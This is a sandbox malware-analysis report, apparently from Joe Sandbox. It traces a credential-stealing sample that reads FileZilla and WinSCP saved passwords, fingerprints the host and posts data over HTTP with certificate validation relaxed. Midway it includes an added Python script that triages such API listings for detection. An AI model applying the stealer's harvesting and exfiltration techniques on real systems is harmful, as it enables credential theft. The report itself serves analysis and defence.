                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?), ref: 00185CC9
                                                                                                                                                                        • _memmove.LIBCMT ref: 00185CD6
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00185CE4
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00185CF2
                                                                                                                                                                        • _memmove.LIBCMT ref: 00185D05
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00185D1A
                                                                                                                                                                        • HttpSendRequestA.WININET(?,?,00000000), ref: 00185D2D
                                                                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00185D6F
                                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00185E26
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,block), ref: 00185E3B
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00185E46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                        • String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$block$build_id$df523263f44cc8d55414a260a0197e4a$file_data
                                                                                                                                                                        • API String ID: 2638065154-1849827821
                                                                                                                                                                        • Opcode ID: 67d70663e7b20b3006c4efaf45bc568db909330afc8aeba9d32992d1231cc5cb
                                                                                                                                                                        • Instruction ID: 9bfe0aab9c3e049caef41729813122bcda0405a74e8666b8f5043dec51f8624a
                                                                                                                                                                        • Opcode Fuzzy Hash: 67d70663e7b20b3006c4efaf45bc568db909330afc8aeba9d32992d1231cc5cb
                                                                                                                                                                        • Instruction Fuzzy Hash: FD428071D111699BEF22FB20DC42ADDB7B8BB24304F0585E1E589B7162DB706F869F80

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
                                                                                                                                                                        • strtok_s.MSVCRT ref: 0018E753
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,001B68FF,001B68FE,001B68EF,001B68EE), ref: 0018E799
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018E7A0
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0018E7B4
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018E7BF
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0018E7F3
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018E7FE
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0018E82C
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018E837
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0018E865
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0018E870
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018E8D6
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018E8EA
                                                                                                                                                                        • lstrlenA.KERNEL32(0018EC91), ref: 0018EA12
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                        • API String ID: 4146028692-935134978
                                                                                                                                                                        • Opcode ID: 22e426902acfc58ab6e02f18dfeb8ad449620b414e4c2d3246448fd668436280
                                                                                                                                                                        • Instruction ID: 8ede167f96e84dc68711f21f54deb8c8c1f999ef999c5b84e235bc685d1e7792
                                                                                                                                                                        • Opcode Fuzzy Hash: 22e426902acfc58ab6e02f18dfeb8ad449620b414e4c2d3246448fd668436280
                                                                                                                                                                        • Instruction Fuzzy Hash: 8DA12D32D41219ABDF02BBA4EC8A9DD7BB8AF29704F114461F601B7061DB74AF468F91

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 0018E18C
                                                                                                                                                                        • _memset.LIBCMT ref: 0018E1AC
                                                                                                                                                                        • _memset.LIBCMT ref: 0018E1BD
                                                                                                                                                                        • _memset.LIBCMT ref: 0018E1CE
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018E202
                                                                                                                                                                        • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0018E233
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018E24B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018E272
                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0018E292
                                                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0018E2B5
                                                                                                                                                                        • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,001B68D7), ref: 0018E34E
                                                                                                                                                                        • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0018E3AE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                        • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                        • API String ID: 463713726-2798830873
                                                                                                                                                                        • Opcode ID: 6f5d8e77f9f7287e173d31e2f977c779084159d9268d043ee3e58eeb132fcfbd
                                                                                                                                                                        • Instruction ID: 23a33dc20356cdb165a977024ecb399a72ba054c80b0213297a20d78f017591b
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f5d8e77f9f7287e173d31e2f977c779084159d9268d043ee3e58eeb132fcfbd
                                                                                                                                                                        • Instruction Fuzzy Hash: DDD1B17291012DABEF22EB94DC82AE9B7B8AF14704F1144E7E509B6051DB70BF85CF61

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 568 185f39-185ffe call 1904ee call 184ab6 call 1904bc * 5 InternetOpenA StrCmpCA 583 186000 568->583 584 186006-18600c 568->584 583->584 585 1866ff-186727 InternetCloseHandle call 188048 584->585 586 186012-18619c call 191c1f call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 19059c call 190562 call 182920 * 2 InternetConnectA 584->586 591 186729-186761 call 19051e call 1905de call 190562 call 182920 585->591 592 186766-1867ec call 182920 * 4 call 181cde call 182920 call 19d05a 585->592 586->585 662 1861a2-1861dc HttpOpenRequestA 586->662 591->592 663 1861e2-1861e8 662->663 664 1866f3-1866f9 InternetCloseHandle 662->664 665 1861ea-186200 InternetSetOptionA 663->665 666 186206-186690 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19059c call 190562 call 182920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 1a70a0 lstrlenA * 2 call 1a70a0 lstrlenA 
HttpSendRequestA 663->666 664->585 665->666 809 1866d2-1866ea InternetReadFile 666->809 810 1866ec-1866ed InternetCloseHandle 809->810 811 186692-18669a 809->811 810->664 811->810 812 18669c-1866cd call 1905de call 190562 call 182920 811->812 812->809
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00185FD8
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00185FF6
                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0018618E
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 001861D2
                                                                                                                                                                        • lstrlenA.KERNEL32(?,",mode,001B78D0,------,001B78C4,df523263f44cc8d55414a260a0197e4a,",build_id,001B78AC,------,001B78A0,",001B7894,------), ref: 001865FD
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018660C
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00186617
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0018661E
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0018662B
                                                                                                                                                                        • _memmove.LIBCMT ref: 00186639
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00186647
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00186655
                                                                                                                                                                        • _memmove.LIBCMT ref: 00186662
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000), ref: 00186677
                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00186685
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 001866E2
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 001866ED
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 001866F9
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186705
                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186200
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                        • String ID: "$"$"$------$------$------$------$build_id$df523263f44cc8d55414a260a0197e4a$mode
                                                                                                                                                                        • API String ID: 3702379033-74871842
                                                                                                                                                                        • Opcode ID: d578a3113e40645e15ce252a2fa6a5a5041d901ffaef9ab68d0aaf1d700d82b3
                                                                                                                                                                        • Instruction ID: ac914e19075e4719dc85943a6dde35ba32b49c1a9e03a7977162d6f4247db24c
                                                                                                                                                                        • Opcode Fuzzy Hash: d578a3113e40645e15ce252a2fa6a5a5041d901ffaef9ab68d0aaf1d700d82b3
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D2263319001699BDF22FB60DC46BCDB774AF29704F4284E2E61977162DB706F8A8F50
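Added example, not code from the Joe Sandbox report or from the analysed sample: a Python triage script that parses API lines in the shape this report uses, groups them by the subcall function the report attributes them to, and flags the host-profiling cluster the next entry lists (MachineGuid read from HKLM\SOFTWARE\Microsoft\Cryptography, GetCurrentHwProfileA, GetVolumeInformationA, CoCreateInstance plus CoSetProxyBlanket, computer and user name, display caps, keyboard layouts, time zone, CPU queries, OpenProcess on the own PID). It also surfaces two details a practitioner would check in the entries above and below: the RegOpenKeyExA access mask 00020119 includes KEY_WOW64_64KEY (0x100), so a 32-bit process is explicitly reading the 64-bit registry view, and InternetSetOptionA with option 0000001F (INTERNET_OPTION_SECURITY_FLAGS) receives 00010300, which includes SECURITY_FLAG_IGNORE_UNKNOWN_CA (0x100). Assumptions: the report prints the DWORD held in that buffer rather than its address; the COM triple is treated as WMI client set-up although the CLSID at 001B2F00 is not resolved in the listing; the category table, the threshold of six categories and the SAMPLE text (abridged copies of lines from this report) are this example's own choices.

```python
"""Triage a Joe Sandbox 'APIs' listing for stealer-style host profiling.

Added example, not code from the report or from the analysed sample. The
category table, the threshold and SAMPLE (abridged lines copied from the
report) are this example's own choices, not Joe Sandbox output semantics.
"""
import json
import re
from collections import defaultdict

# Line shapes handled (taken from the report):
#   '• Part of subcall function 001915A9: RegOpenKeyExA.KERNEL32(80000002,...), ref: 001915FB'
#   '• GetCurrentProcessId.KERNEL32(Path: ,001B6884), ref: 00193E1B'      (top-level call)
#   '• Part of subcall function 00190C95: wsprintfA.USER32 ref: 00190CEB'  (no argument list)
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<func>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KEY_ACCESS = {  # winnt.h registry access-mask bits
    0x00001: "KEY_QUERY_VALUE", 0x00008: "KEY_ENUMERATE_SUB_KEYS", 0x00010: "KEY_NOTIFY",
    0x00100: "KEY_WOW64_64KEY", 0x00200: "KEY_WOW64_32KEY", 0x20000: "STANDARD_RIGHTS_READ",
}
SECURITY_FLAGS = {  # wininet.h SECURITY_FLAG_* bits
    0x00080: "SECURITY_FLAG_IGNORE_REVOCATION", 0x00100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00200: "SECURITY_FLAG_IGNORE_WRONG_USAGE", 0x01000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x02000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID", 0x10000: "SECURITY_FLAG_IGNORE_WEAK_SIGNATURE",
}
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAG_IGNORE_UNKNOWN_CA = 0x100
KEY_WOW64_64KEY = 0x100
PROCESS_QUERY_INFORMATION_VM_READ = 0x410  # PROCESS_QUERY_INFORMATION | PROCESS_VM_READ


def parse_api_lines(text):
    """Return [(func, api, module, [args], ref)]; top-level calls get func='main'."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append((m.group("func") or "main", m.group("api"), m.group("module"), args, m.group("ref")))
    return calls


def hex_arg(args, i):
    """args[i] as int when the report printed a hex literal; None for '?' or a string."""
    try:
        return int(args[i], 16)
    except (IndexError, ValueError):
        return None


def decode_key_access(mask):
    return [name for bit, name in sorted(KEY_ACCESS.items()) if mask & bit]


def decode_security_flags(flags):
    return [name for bit, name in sorted(SECURITY_FLAGS.items()) if flags & bit]


def profiling_categories(calls):
    """Map fingerprinting category -> set of subcall functions that exhibit it."""
    by_func = defaultdict(list)
    for func, api, _module, args, _ref in calls:
        by_func[func].append((api, args))
    hits = defaultdict(set)
    for func, seq in by_func.items():
        apis = {api for api, _ in seq}
        flat_args = [a for _, args in seq for a in args]
        if ("RegQueryValueExA" in apis and "MachineGuid" in flat_args
                and any(a.endswith("Microsoft\\Cryptography") for a in flat_args)):
            hits["machine_guid"].add(func)
        if "GetCurrentHwProfileA" in apis:
            hits["hw_profile"].add(func)
        if "GetVolumeInformationA" in apis:
            hits["volume_info"].add(func)
        # Assumption: this COM triple is WMI client set-up; the CLSID is unresolved in the report.
        if {"CoInitializeEx", "CoCreateInstance", "CoSetProxyBlanket"} <= apis:
            hits["com_query"].add(func)
        if apis & {"GetComputerNameA", "GetUserNameA"}:
            hits["identity"].add(func)
        if {"CreateDCA", "GetDeviceCaps"} <= apis:
            hits["display"].add(func)
        if {"GetKeyboardLayoutList", "GetLocaleInfoA"} <= apis:
            hits["keyboard"].add(func)
        if "GetTimeZoneInformation" in apis:
            hits["timezone"].add(func)
        if apis & {"GetSystemInfo", "GetLogicalProcessorInformationEx"}:
            hits["cpu"].add(func)
        if any(api == "OpenProcess" and hex_arg(args, 0) == PROCESS_QUERY_INFORMATION_VM_READ
               for api, args in seq):
            hits["self_path"].add(func)  # paired with K32GetModuleFileNameExA in the report
    return hits


def tls_validation_disabled(calls):
    """InternetSetOptionA(h, INTERNET_OPTION_SECURITY_FLAGS, &flags, 4) with IGNORE_UNKNOWN_CA set.
    Assumption: the report prints the DWORD the buffer holds, not the buffer address."""
    return any(api == "InternetSetOptionA" and hex_arg(args, 1) == INTERNET_OPTION_SECURITY_FLAGS
               and (hex_arg(args, 2) or 0) & SECURITY_FLAG_IGNORE_UNKNOWN_CA
               for _f, api, _m, args, _r in calls)


def wow64_64key_registry(calls):
    """RegOpenKeyExA samDesired (argument 3) carries KEY_WOW64_64KEY: explicit 64-bit view."""
    return any(api == "RegOpenKeyExA" and (hex_arg(args, 3) or 0) & KEY_WOW64_64KEY
               for _f, api, _m, args, _r in calls)


def triage(text, min_categories=6):
    calls = parse_api_lines(text)
    cats = profiling_categories(calls)
    return {
        "calls_parsed": len(calls),
        "profiling_categories": sorted(cats),
        "host_profiling": len(cats) >= min_categories,
        "tls_validation_disabled": tls_validation_disabled(calls),
        "wow64_64key_registry": wow64_64key_registry(calls),
    }


# Constructed input: abridged copies of lines from this report's API listings.
SAMPLE = """\
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186200
• Part of subcall function 001915A9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\\Microsoft\\Cryptography,00000000,00020119,?,?,?,?), ref: 001915FB
• Part of subcall function 001915A9: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00191620
• Part of subcall function 00191659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00191674
• Part of subcall function 00190977: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001909EA
• Part of subcall function 0019221F: OpenProcess.KERNEL32(00000410,00000000,00193E2A,00000000,?), ref: 00192241
• Part of subcall function 001917DC: CoInitializeEx.OLE32(00000000,00000000,0000004C,00193F39,Install Date: ,001B68B8), ref: 001917F4
• Part of subcall function 001917DC: CoCreateInstance.OLE32(001B2F00,00000000,00000001,001B2E30,?), ref: 0019181F
• Part of subcall function 001917DC: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00191855
• Part of subcall function 00190C5A: GetComputerNameA.KERNEL32(00000000,00181385), ref: 00190C81
• Part of subcall function 00190C28: GetUserNameA.ADVAPI32(00000000,001813B9), ref: 00190C4F
• Part of subcall function 00191538: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0019154A
• Part of subcall function 00191538: GetDeviceCaps.GDI32(00000000,00000008), ref: 00191555
• Part of subcall function 00190DB0: GetKeyboardLayoutList.USER32(00000000,00000000,001B670A,?,?), ref: 00190DE1
• Part of subcall function 00190DB0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00190E2C
• Part of subcall function 00190D03: GetTimeZoneInformation.KERNEL32(?), ref: 00190D34
• Part of subcall function 00190F8F: GetSystemInfo.KERNEL32(?), ref: 00190FA9
• Part of subcall function 00190C95: wsprintfA.USER32 ref: 00190CEB
"""

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE), indent=2))
    print("RegOpenKeyExA 0x20119 =", decode_key_access(0x20119))
    print("InternetSetOptionA 0x10300 =", decode_security_flags(0x10300))
```

Grouping by the "Part of subcall function" address matters: a lone GetSystemInfo or GetUserNameA is benign, so the verdict is driven by how many distinct profiling categories appear across the routine, and each category is only credited when its API combination sits in one function, which keeps single stray calls from scoring.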

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
control_flow_graph 818 193bc6-1945e5 call 1904bc call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190c95 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1915a9 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 191659 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190977 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 GetCurrentProcessId call 19221f call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190b05 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1917dc call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19196c call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190c5a call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190c28 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 191538 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190db0 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190c95 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 